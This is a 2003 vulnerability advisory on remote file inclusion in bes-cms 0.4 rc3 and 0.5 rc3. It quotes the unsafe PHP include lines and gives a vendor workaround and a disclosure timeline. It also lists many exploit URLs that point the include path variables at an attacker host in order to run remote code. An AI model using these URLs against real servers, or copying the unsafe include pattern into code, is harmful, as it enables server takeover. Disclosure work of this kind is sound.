bes-cms is "a professional dynamic php website building tool. It was developed at mokka by a bored programmer. Bes-cms is capable of creating images galleries, message boards, news sections download sections contact sections and many more to be added on the plugin server". A vulnerability has been discovered in bes-cms that allows remote attackers to cause the script to include arbitrary PHP code (allows remote command execution).
Credit:
The information has been provided by frog-m at n.
Vulnerable systems:
* bes-cms version 0.4 rc3
* bes-cms version 0.5 rc3
Immune systems:
* bes-cms version 0.5 rc4
In the files:
* index.inc.php
* Members/index.inc.php
* Members/root/index.inc.php
We can see the following code: include_once($PATH__Includes."actions_default.php");
In the Include/functions_folder.php file : include($PATH__Includes.'functions_folder_modules.php');
include($PATH__Includes.'functions_folder_plugins.php');
include($PATH__Includes.'functions_folder_files.php');
In the Include/functions_hacking.php file : switch($_GET['itemID'])
{
case 'usershow':
include_once("".$PATH__Includes."functions_user.php");
Show_USer_Details($_GET['user']);
break;
[...]
case 'send_bug':
if ($UserDetails['LOGGED_IN'] == 'YES')
{
global $PATH__Includes;
include_once("".$PATH__Includes."functions_error.php");
send_bug_report();
}
break;
[...]
case 'content_view':
global $PATH___Includes;
include_once("".$PATH__Includes."functions_message_docTypes.php");
Message_Centent_View($Plugin_Path);
break;
case 'logger':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_users.php");
Loggin_Message();
break;
case 'search':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_general.php");
Display_Search_Results($_POST['search_str']);
break;
[...]
In the Include/functions_message.php file: include($PATH__Includes.'functions_message_docTypes.php');
include($PATH__Includes.'functions_message_edit.php');
In addition, in the Include/Start.php file: include_once($inc_path."Include/vars.php");
Making all these files vulnerable. We can see that all inclusions of file begin by a indefinite variable in the code ($inc_path or $PATH_Includes) and so could be definite by an attacker.
Exploits:
If register_globals=ON has been marked we can exploit any of the below URLs to cause it to include external files.
The following URLs will cause the server to include external files: http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/
The requested file will be http://[attacker]/actions_default.php.
The following URL will cause the server to include: http://[target]/Include/functions_folder.php?PATH_Includes=http://[attacker]/
The requested files will be http://[attacker]/functions_folder_modules.php, http://[attacker]/functions_folder_plugins.php, http://[attacker]/functions_folder_files.php.
The following URLs will cause the server to include external files: http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=logger
The requested file will be http://[attacker]/functions_user.php
The following URL will cause the server to include external files: http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES
The requested file will be http://[attacker]/functions_error.php.
The following URL will cause the server to include external files: http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=content_view.
The requested file will be http://[attacker]/functions_message_docTypes.php.
The following URL will cause the server to include external files: http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=search
The requested file will be http://[attacker]/functions_general.php.
The following URL will cause the server to include external files: http://[target]/Include/functions_message.php?PATH_Includes=http://[attacker]/.
The requested files will be http://[attacker]/functions_message_docTypes.php, http://[attacker]/functions_message_edit.php.
The following URL will cause the server to include external files: http://[target]/Include/Start.php?inc_path=http://[attacker]/
The requested file will be http://[attacker]/Include/vars.php.
Solution:
The creator was notified, and has created an immune version (version 0.5 rc4).
Workaround:
In index.inc.php, Members/index.inc.php, Members/root/index.inc.php, Include/functions_folder.php, Include/functions_hacking.php and Include/functions_message.php simply add the following line as the first line:
if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info"); }
And at the begining of the Include/Start.php file, add the following line as the first line: if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
Disclosure timeline:
13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure
